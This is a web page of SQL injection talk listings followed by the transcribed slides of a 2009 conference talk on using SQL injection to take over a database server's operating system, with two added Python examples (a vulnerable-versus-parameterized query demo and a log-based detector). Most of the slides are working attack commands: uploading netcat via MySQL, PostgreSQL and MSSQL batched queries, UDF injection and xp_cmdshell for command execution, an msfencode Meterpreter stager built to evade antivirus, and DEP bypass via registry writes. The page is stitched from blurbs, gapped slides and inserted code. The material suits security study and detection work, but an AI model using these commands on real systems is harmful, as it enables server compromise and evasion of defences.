Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
These slides have been presented at EUSecWest conference in London on May 28, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
Expanding the control over the operating system from the database, by Bernardo Damele A. G.
A database, reached either via a SQL injection or via a direct connection, can be used as a stepping stone to control the underlying operating system.
There is much to say about operating system control once a database server is owned: Windows registry access, an anti-forensics technique to establish an out-of-band stealth connection, buffer overflow exploitation with memory protection bypass, and custom user-defined function injection.
These slides have been presented at SOURCE Conference in Barcelona on September 21, 2009.
Advanced SQL injection to operating system full control (short version), by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
These slides have been presented at OWASP AppSec Europe 2009 conference in Krakow on May 13, 2009.
Full version presented at Black Hat Europe 2009 Conference, slides available here, http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-full-control-slides.
The presentation highlights techniques to exploit a MySQL, PostgreSQL or Microsoft SQL Server database server in the real world: how to abuse database features to take over the server as a whole, how to break out of the database process, gain control of the operating system and escalate the process's privileges to SYSTEM, and how to make the forensic analyst's life harder during a post-exploitation investigation.
These slides have been presented at AthCon 2010 conference in Athens on June 3, 2010.
The presentation has a quick preamble on the SQL injection definition, sqlmap and its key features.
I will then illustrate in detail common and uncommon problems, and their respective solutions, with examples that a penetration tester faces when he wants to take advantage of any kind of SQL injection flaw in real-world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single-entry UNION query SQL injection, IDS bypasses specific to particular web application technologies, and more.
These slides have been presented at the 2nd Digital Security Forum in Lisbon on June 27, 2009.
Updated version of http://www.slideshare.net/inquis/sql-injection-not-only-and-11.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.
A basic tutorial on using sqlmap on Kali Linux for SQL injection, focusing on a comparison between manual and automated SQL injection.
Some important parameters are discussed, along with the steps to take to discover vulnerabilities.
By Rushikesh Kulkarni, president of the Anonymous Club of BMSCE.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Advanced SQL injection to operating system full control (slides), by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
These slides have been presented at the Black Hat Europe conference in Amsterdam on April 16, 2009.
Advanced SQL injection to operating system full control (whitepaper), by Bernardo Damele A. G.
Over ten years have passed since a famous hacker coined the term "SQL injection", and it is still considered one of the major web application threats, affecting over 70% of web applications on the Net. A lot has been said about this specific vulnerability, but not all of its aspects and implications have been uncovered yet.
It's time to explore new ways to get complete control over the database management system's underlying operating system through a SQL injection vulnerability in those over-looked and theoretically not exploitable scenarios: From the command execution on MySQL and PostgreSQL to a stored procedure's buffer overflow exploitation on Microsoft SQL Server. These and much more will be unveiled and demonstrated with my own tool's new version that I will release at the Conference (http://www.blackhat.com/html/bh-europe-09/bh-eu-09-speakers.html#Damele).
The presentation has a quick preamble on SQL injection definition, sqlmap and its key features.
I then illustrate in detail common and uncommon problems, and their respective solutions, with examples that a penetration tester faces when he wants to take advantage of any kind of SQL injection flaw in real-world web applications, for instance SQL injection in ORDER BY and LIMIT clauses, single-entry UNION query SQL injection, IDS bypasses specific to particular web application technologies, and more.
These slides have been presented at the Front Range OWASP Conference in Denver on March 5, 2009.
SQL injection exploitation internals: How do I exploit this web application injection point?
These slides have been presented at a private conference in London on January 9, 2009.
This presentation was given at the November 2012 chapter meeting of the Memphis ISSA. In the presentation, I discuss various methods of exploiting common SQL Injection vulnerabilities, as well as present a specialized technique known as Time-Based Blind SQL Injection. Related to the latter, I give a scenario in which other common forms of SQL Injection would fail to produce results for a penetration tester or attacker, and show how one may overcome this situation by using the specialized technique. The scenario given, along with the sample code, is NOT a contrived example, but instead is closely based on a real-world application that I encountered as part of an assessment.
A live demonstration of the common forms of SQL Injection was also given which utilized the OWASP Broken Web Apps VM, DVWA, Burp Proxy and SQL Power Injector. To demo a real-world time-based blind injection, I created and locally hosted a new application which closely mimicked the real-world application mentioned above.
What they are, steps you can take to prevent them, a brief overview.
3/13/2013 winter term 2013 at Portland State University for the Introduction to Databases class.
Presented by Stacy Watts and Tyler Fetters
SQL Injection: complete walkthrough (not only) for PHP developers, by Krzysztof Kotowicz
Learn what SQL injection is, how to use prepared statements, how to escape, and how to write secure stored procedures. Many PHP projects are covered: PDO, Propel, Doctrine, Zend Framework and MDB2. Multiple gotchas included.
Advanced SQL injection to operating system full control (short version)
1. Advanced SQL injection to operating system full control
Bernardo Damele Assumpção Guimarães
EUSecWest 2009
London (UK) – May 28, 2009
2. Who I am
Bernardo Damele Assumpção Guimarães:
Proud father
Penetration tester / security researcher
Portcullis Computer Security Ltd
Open source projects
sqlmap lead developer
MySQL UDF repository developer
Metasploit contributor
EUSecWest 2009, London (UK) May 28, 2009 2
3. SQL injection definition
SQL injection attacks are a type of injection attack in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL statements.
It is a common threat in web applications that lack proper sanitization of user-supplied input used in SQL queries.
It does not affect only web applications!
4. SQL injection techniques
Boolean-based blind SQL injection:
par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--
UNION query (inband) SQL injection:
par=1 UNION ALL SELECT query--
Batched queries SQL injection:
par=1; SQL query;--
5. How far can an attacker go by exploiting a SQL injection?
6. Scope of the analysis
Three database management systems:
MySQL on Windows
PostgreSQL on Windows and Linux
Microsoft SQL Server on Windows
Three web application languages:
ASP on Microsoft IIS, Windows
ASP.NET on Microsoft IIS, Windows
PHP on Apache and Microsoft IIS
7. Batched queries
In SQL, batched queries are multiple SQL statements, separated by a semicolon, and passed to the database in a single call
Example:
SELECT col FROM table1 WHERE id=1; DROP TABLE table2;
8. Batched queries support
                      ASP   ASP.NET   PHP
MySQL                 No    Yes       No
PostgreSQL            Yes   Yes       Yes
Microsoft SQL Server  Yes   Yes       Yes
Programming languages and their DBMS connectors' default support for batched queries
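The definition on slide 3, the three payload shapes on slide 4 and the batched-queries table on slide 8, worked through in code. This is an added example, not taken from the slides or from sqlmap: a constructed two-table SQLite schema, one lookup that concatenates the `par` value into the statement text and one that binds it as a parameter. `lookup_vulnerable_batched` stands in for the connectors marked Yes in the table and `stacked_rejected` for the ones marked No; table, column and user names are all made up.

```python
"""Added example (not from the slides): one product lookup written with string
concatenation and with a bound parameter, exercised with the payload shapes
from slides 4 and 7 against an in-memory SQLite database."""
import sqlite3

# Constructed sample schema: a table the page is meant to read and one it is not.
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO products VALUES (1, 'widget'), (2, 'gadget');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT);
INSERT INTO users VALUES (1, 'admin', 'constructed-hash-value');
"""


def new_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def table_names(db):
    return [r[0] for r in db.execute(
        "SELECT name FROM sqlite_master WHERE type='table' ORDER BY name")]


def lookup_vulnerable(db, par):
    """`par` is pasted into the SQL text, so it can change the statement."""
    sql = "SELECT name FROM products WHERE id=" + par
    return [row[0] for row in db.execute(sql)]


def lookup_vulnerable_batched(db, par):
    """Same concatenation through a path that runs every statement it is given
    (the Yes cells of the slide-8 table); returns the tables left afterwards."""
    db.executescript("SELECT name FROM products WHERE id=" + par)
    return table_names(db)


def stacked_rejected(db, par):
    """True when the connector refuses more than one statement per call
    (the No cells): sqlite3's execute() raises instead of running the batch."""
    try:
        lookup_vulnerable(db, par)
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        return True
    return False


def lookup_parameterized(db, par):
    """`par` travels as a bound value; the statement text is fixed, so none of
    the payload shapes below can alter it."""
    return [row[0] for row in
            db.execute("SELECT name FROM products WHERE id=?", (par,))]


# Payload shapes from slides 4 and 7, constructed for this demonstration.
UNION_PAYLOAD = "1 UNION ALL SELECT username FROM users--"
BLIND_TRUE = "1 AND unicode(substr((SELECT username FROM users),1,1))>96--"
BLIND_FALSE = "1 AND unicode(substr((SELECT username FROM users),1,1))>97--"
STACKED_PAYLOAD = "1; DROP TABLE users;"

if __name__ == "__main__":
    db = new_db()
    print(lookup_vulnerable(db, UNION_PAYLOAD))        # ['widget', 'admin']
    print(lookup_vulnerable(db, BLIND_TRUE))           # ['widget']
    print(lookup_vulnerable(db, BLIND_FALSE))          # []
    print(lookup_parameterized(db, UNION_PAYLOAD))     # []
    print(stacked_rejected(db, STACKED_PAYLOAD))       # True
    print(lookup_vulnerable_batched(new_db(), STACKED_PAYLOAD))  # ['products']
```

Running it shows the UNION payload pulling a row out of `users`, the two boolean payloads returning one row and then none (the bisection oracle of slide 4), and the same inputs returning nothing through the bound parameter. Whether the stacked payload drops a table depends on the connector path, exactly as the slide-8 table says; the bound parameter removes the question.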
10. File write access on MySQL
On the attacker box:
Encode the local file content to its corresponding hexadecimal string
Split the hexadecimal encoded string into chunks of 1024 characters each
11. File write access on MySQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data longblob);
INSERT INTO footable(data) VALUES (0x4d5a90…610000);
UPDATE footable SET data=CONCAT(data, 0xaa270000…000000);
[…];
SELECT data FROM footable INTO DUMPFILE 'C:/WINDOWS/Temp/nc.exe';
12. File write access on PostgreSQL
On the attacker box:
Encode the local file content to its corresponding base64 string
Split the base64 encoded string into chunks of 1024 characters each
13. File write access on PostgreSQL
Via batched queries SQL injection technique:
CREATE TABLE footable(data text);
INSERT INTO footable(data) VALUES ('TVqQ…');
UPDATE footable SET data=data||'U8pp…vgDw';
[…]
SELECT lo_create(47);
UPDATE pg_largeobject SET data=(DECODE((SELECT data FROM footable), 'base64')) WHERE loid=47;
SELECT lo_export(47, 'C:/WINDOWS/Temp/nc.exe');
14. File write access on MS SQL Server
Microsoft SQL Server can execute operating system commands through the xp_cmdshell() extended stored procedure:
EXEC xp_cmdshell('echo … >> filepath')
Session user must have CONTROL SERVER privilege
On the attacker box:
Split the file in chunks of 64Kb
Convert each chunk to its plain text debug script format
15. File write access on MS SQL Server
Example of nc.exe:
00000000 4D 5A 90 00 03 00 00 00
00000008 04 00 00 00 FF FF 00 00
[…]
As a plain text debug script:
n qqlbc                   // Create a temporary file
rcx                       // Write the file size in the CX register
f000
f 0100 f000 00            // Fill the segment with 0x00
e 100 4d 5a 90 00 03 […]  // Write all values into memory
e 114 00 00 00 00 40 […]
[…]
w                         // Write the file to disk
q                         // Quit debug.exe
16. File write access on MS SQL Server
Via batched queries SQL injection technique:
For each debug script:
EXEC master..xp_cmdshell '
echo n qqlbc >> C:\WINDOWS\Temp\zdfiq.scr &
echo rcx >> C:\WINDOWS\Temp\zdfiq.scr &
echo f000 >> C:\WINDOWS\Temp\zdfiq.scr &
echo f 0100 f000 00 >> C:\WINDOWS\Temp\zdfiq.scr &
[…]'
17. File write access on MS SQL Server
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
debug < C:\WINDOWS\Temp\zdfiq.scr &
del /F C:\WINDOWS\Temp\zdfiq.scr &
copy /B /Y netcat+qqlbc netcat'
EXEC master..xp_cmdshell '
cd C:\WINDOWS\Temp &
move /Y netcat C:\WINDOWS\Temp\nc.exe'
19. User-Defined Function
In SQL, a user-defined function is a custom function that can be evaluated in SQL statements
UDF can be created from shared libraries, that is, compiled binary files:
Dynamic-link library on Windows
Shared object on Linux
20. UDF injection
On the attacker box:
Compile a shared library defining two UDF:
sys_eval(cmd): executes cmd, returns stdout
sys_exec(cmd): executes cmd, returns status
The shared library can also be packed to speed up the upload via SQL injection:
Windows: UPX for the dynamic-link library
Linux: strip for the shared object
21. UDF injection
Via batched queries SQL injection technique:
Upload the shared library to the DBMS file system
Create the two UDF from the shared library
Call either of the UDF to execute commands
22. UDF injection on MySQL
UDF Repository for MySQL
lib_mysqludf_sys shared library:
Approximately 6Kb packed
Added sys_eval() to return command standard output
Compliant with MySQL 5.0+
Works on all versions of MySQL from 4.1.0
Compatible with both Windows and Linux
23. UDF injection on MySQL
Via batched queries SQL injection technique:
Fingerprint MySQL version
Upload the shared library to a file system path where MySQL looks for plugins
CREATE FUNCTION sys_exec RETURNS int SONAME 'libudffmwgj.dll';
CREATE FUNCTION sys_eval RETURNS string SONAME 'libudffmwgj.dll';
24. UDF injection on PostgreSQL
Ported MySQL shared library to PostgreSQL
lib_postgresqludf_sys shared library:
Approximately 6Kb packed
C-Language Functions: sys_eval() and sys_exec()
Compliant with PostgreSQL 8.2+ magic block
Works on all versions of PostgreSQL from 8.0
Compatible with both Windows and Linux
25. UDF injection on PostgreSQL
Via batched queries SQL injection technique:
Fingerprint PostgreSQL version
Upload the shared library to any file system path where PostgreSQL has rw access
CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'libudflenpx.dll', 'sys_exec' LANGUAGE C […];
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'libudflenpx.dll', 'sys_eval' LANGUAGE C […];
26. Command execution on MS SQL Server
xp_cmdshell() stored procedure:
Session user must have the sysadmin role or be specified as a proxy account
Enabled by default on MS SQL Server 2000, or re-enabled via sp_addextendedproc
27. Command execution on MS SQL Server
Disabled by default on MS SQL Server 2005 and 2008, it can be:
Re-enabled via sp_configure
Created from scratch using the shell object
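Every primitive on slides 10 to 27 leaves a recognisable statement in the database's query or audit log. Added here as the defender's counterpart, not part of the slides: a small scanner over constructed log lines (tab-separated timestamp, session user, statement) that flags the file-write, UDF-load and command-execution statements the slides name, plus the behaviour that precedes all of them, a run of `UPDATE … CONCAT(data, 0x…)` or `… || '<base64>'` appends to a single staging table. `sp_OACreate` is the OLE automation procedure behind the "shell object" of slide 27 and is not spelled out on the slides; the log format, user names and file names are assumptions.

```python
"""Added example (not from the slides): flag, in a constructed query log, the
statements the slides use for file write, UDF loading and command execution,
and the chunked-upload pattern that precedes them."""
import re
from collections import Counter

# (pattern, DBMS, technique) for the primitives named on slides 10-27.
# sp_OACreate is the OLE automation procedure behind the slide-27 "shell
# object"; it is real T-SQL but is not spelled out on the slides.
INDICATORS = [
    (re.compile(r"\bINTO\s+DUMPFILE\b", re.I), "MySQL", "file write"),
    (re.compile(r"\bCREATE\s+FUNCTION\b.*\bSONAME\b", re.I), "MySQL", "UDF load"),
    (re.compile(r"\blo_(create|export)\s*\(", re.I), "PostgreSQL", "file write"),
    (re.compile(r"\bUPDATE\s+pg_largeobject\b", re.I), "PostgreSQL", "file write"),
    (re.compile(r"\bCREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b.*\bLANGUAGE\s+C\b", re.I),
     "PostgreSQL", "UDF load"),
    (re.compile(r"\bxp_cmdshell\b", re.I), "MSSQL", "command execution"),
    (re.compile(r"\bsp_configure\b.*xp_cmdshell", re.I), "MSSQL", "xp_cmdshell enable"),
    (re.compile(r"\bsp_addextendedproc\b", re.I), "MSSQL", "xp_cmdshell enable"),
    (re.compile(r"\bsp_OACreate\b", re.I), "MSSQL", "shell object"),
    (re.compile(r"\bxp_regwrite\b", re.I), "MSSQL", "registry write"),
    (re.compile(r"\bsp_replwritetovarbin\b", re.I), "MSSQL", "MS09-004 trigger"),
]

# Slides 11 and 13 stage a binary by appending literal chunks to one table:
#   MySQL       UPDATE t SET data=CONCAT(data, 0x....)
#   PostgreSQL  UPDATE t SET data=data||'base64...'
STAGING = re.compile(
    r"\bUPDATE\s+(\w+)\s+SET\s+\w+\s*=\s*"
    r"(?:CONCAT\(\s*\w+\s*,\s*0x[0-9a-f]+|\w+\s*\|\|\s*'[A-Za-z0-9+/=]+')", re.I)


def parse(line):
    """Constructed log format: timestamp<TAB>session user<TAB>statement."""
    ts, user, sql = line.split("\t", 2)
    return ts, user, sql


def scan(lines):
    """One (timestamp, user, dbms, technique) tuple per indicator match."""
    hits = []
    for line in lines:
        ts, user, sql = parse(line)
        for pat, dbms, technique in INDICATORS:
            if pat.search(sql):
                hits.append((ts, user, dbms, technique))
    return hits


def staging_runs(lines, threshold=3):
    """(user, table) pairs with at least `threshold` chunk appends: a file
    being uploaded piecewise, whichever DBMS syntax is in use."""
    counts = Counter()
    for line in lines:
        _, user, sql = parse(line)
        m = STAGING.search(sql)
        if m:
            counts[(user, m.group(1).lower())] += 1
    return {k: v for k, v in counts.items() if v >= threshold}


# Constructed sample log; file names are placeholders, not real artefacts.
SAMPLE_LOG = """\
2009-05-28T10:00:01\twebapp\tSELECT name FROM products WHERE id=1
2009-05-28T10:00:02\twebapp\tSELECT name FROM products WHERE id=1; CREATE TABLE footable(data longblob);
2009-05-28T10:00:03\twebapp\tINSERT INTO footable(data) VALUES (0x4d5a9000)
2009-05-28T10:00:04\twebapp\tUPDATE footable SET data=CONCAT(data, 0xaa270000)
2009-05-28T10:00:05\twebapp\tUPDATE footable SET data=CONCAT(data, 0x00000000)
2009-05-28T10:00:06\twebapp\tUPDATE footable SET data=CONCAT(data, 0x0000ffff)
2009-05-28T10:00:07\twebapp\tSELECT data FROM footable INTO DUMPFILE 'C:/PLACEHOLDER/lib.dll'
2009-05-28T10:00:08\twebapp\tCREATE FUNCTION sys_exec RETURNS int SONAME 'lib.dll'
2009-05-28T10:01:00\treport\tUPDATE footable SET data=data||'TVqQAA=='
2009-05-28T10:02:00\tdba\tEXEC sp_configure 'xp_cmdshell', 1
2009-05-28T10:02:01\tdba\tEXEC master..xp_cmdshell 'dir'
2009-05-28T10:03:00\tanalyst\tSELECT lo_export(47, '/PLACEHOLDER/out.bin')
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for hit in scan(lines):
        print(*hit)
    print(staging_runs(lines))   # {('webapp', 'footable'): 3}
```

The indicator list is deliberately literal: each pattern is a statement an application account has no business issuing, so a match from the web application's DB user is actionable on its own. The staging rule is the earlier signal; three appends of raw hex or base64 to one table by one user, within the same session, is the slide-11/13 upload in progress, before any `INTO DUMPFILE` or `lo_export` has run.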
29. OOB connection definition
Contrary to in-band connections (HTTP), it uses an alternative channel to return data
This concept can be extended to establish a full-duplex connection between the attacker host and the database server
Over this channel the attacker can have a command prompt or graphical access (VNC) to the DBMS server
30. A good friend: Metasploit
Metasploit is a powerful open source exploitation framework
Post-exploitation in a SQL injection scenario
SQL injection as a stepping stone for an OOB channel using Metasploit can be achieved
Requires file system write access and command execution via in-band connection – already achieved
31. OOB via payload stager
On the attacker box:
Forge a stand-alone payload stager with msfpayload
Encode it with msfencode to bypass AV
Pack it with UPX to speed up the upload via SQL injection if the target OS is Windows
32. OOB via payload stager
Example of payload stager creation and encode:
$ msfpayload windows/meterpreter/bind_tcp EXITFUNC=process LPORT=31486 R | msfencode -e x86/shikata_ga_nai -t exe -o stagerbvdcp.exe
Payload stager compression:
$ upx -9 -qq stagerbvdcp.exe
The payload stager size is 9728 bytes; as a compressed executable its size is 2560 bytes
33. OOB via payload stager
On the attacker box:
Run msfcli with multi/handler exploit
Via batched queries SQL injection technique:
Upload the stand-alone payload stager to the file system temporary folder of the DBMS
Execute it via sys_exec() or xp_cmdshell()
34. Stored procedure buffer overflow
Discovered by Bernhard Mueller on December 4, 2008
sp_replwritetovarbin heap-based buffer overflow on Microsoft SQL Server 2000 SP4 and Microsoft SQL Server 2005 SP2
Patched by Microsoft on February 10, 2009 – MS09-004
35. Buffer overflow exploit
Session user needs only EXECUTE privilege on the stored procedure – the default
Guido Landi wrote the first public stand-alone exploit for this vulnerability
I added support for multi-stage payload and integrated it in sqlmap
36. Data Execution Prevention
DEP is a security feature that prevents code execution in memory pages not marked as executable
It can be configured to allow exceptions
Default settings allow exceptions:
Windows 2003 SP1+: OptOut
Windows 2008 SP0+: OptOut
37. Bypass DEP
When it is set to OptOut:
Exception for sqlservr.exe in the registry
Via bat file by calling reg
Via reg file by passing it to regedit
Via master..xp_regwrite
Upload and execute a bat file which executes sc to restart the process
38. Credits
Guido Landi
Alberto Revelli
Alessandro Tanasi
Metasploit development team
More acknowledgments and references in the white paper, http://tinyurl.com/sqlmap1